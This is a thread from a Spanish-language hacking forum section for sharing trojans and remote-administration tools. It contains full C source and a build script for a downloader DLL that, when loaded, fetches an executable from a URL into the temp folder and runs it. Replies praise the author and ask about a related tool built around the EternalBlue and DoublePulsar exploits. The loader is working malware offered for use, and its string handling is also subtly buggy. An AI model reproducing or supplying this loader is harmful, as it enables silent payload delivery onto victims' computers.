• Troyanos y Herramientas

  • Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
 #491849  por SuC
 
Te quedo de lujo Blau, todo un master!
 #491872  por David Saiz
 
Blau escribió: 16 May 2017, 20:38 A petición de un compañero por el grupo de Skype, os dejo el código para un downloader DLL en C. Debéis instalar TDM-GCC (o cualquier compilador basado en MinGW).

Downloader.c
#include <windows.h>
BOOL __cdecl __declspec(dllexport) Download() {
	char* szUrl = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe";
	char* szPath = "aaaaa.exe";
	
	char *szTempPath = malloc(256);
	DWORD dwPathLength = GetTempPathA(256, szTempPath);
	
	strncat(szTempPath, szPath, dwPathLength);
	szTempPath[dwPathLength + strlen(szPath) + 1] = 0;

	HRESULT hRes = URLDownloadToFileA(NULL, szUrl, szTempPath, 0, NULL); 
	if(hRes == S_OK) {
		ShellExecuteA(NULL, "open", szTempPath, NULL, NULL, SW_SHOW);
	}
	
    return TRUE;
} 

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if(fdwReason != DLL_PROCESS_ATTACH) return TRUE;
    return Download();
} 
Para compilar normalmente me hago un archivo .bat con esta estructura:
@ECHO OFF
SET InputFile=Downloader
SET Parameters=-w -Os -s -fpermissive -shared -lurlmon

del %InputFile%32.dll										
gcc %InputFile%.c %Parameters% -m32 -o %InputFile%32.dll	

del %InputFile%64.dll										
gcc %InputFile%.c %Parameters% -m64 -o %InputFile%64.dll
Hola, soy nuevo aquí y me gustaría ponerme en contacto contigo.
 #491935  por MatzHKR
 
Blau eres un genio, un guru.
 #492570  por Blau
 
Añadido código fuente en el post principal.
 #492905  por rafactumest123
 
Lo ejecuto en Kali con MONO pero a la hora de dar en "start" me lanza un error que dice que no se encuentra el archivo doublepulsar ni eternalblue... ya revise el codigo fuente y hace la referencia correcta a la carpeta bin ... no encuentro el problema, alguien puede ayudarme???
 #492913  por Blau
 
No lo he probado en Linux pero supongo que habria que modificar el código para correr los ejecutables bajo wine.

 #495619  por zika171213
 
De casualidad alguien lo tendra que pueda pasarmelo, por favor? Gracias. 
 

 #495627  por lcno
 
El código fuente esta en la primer pagina!  

Re:

 #495661  por TITAN
 
lcno: escribió: El código fuente esta en la primer pagina!  
El link de mega que subió Blau esta muerto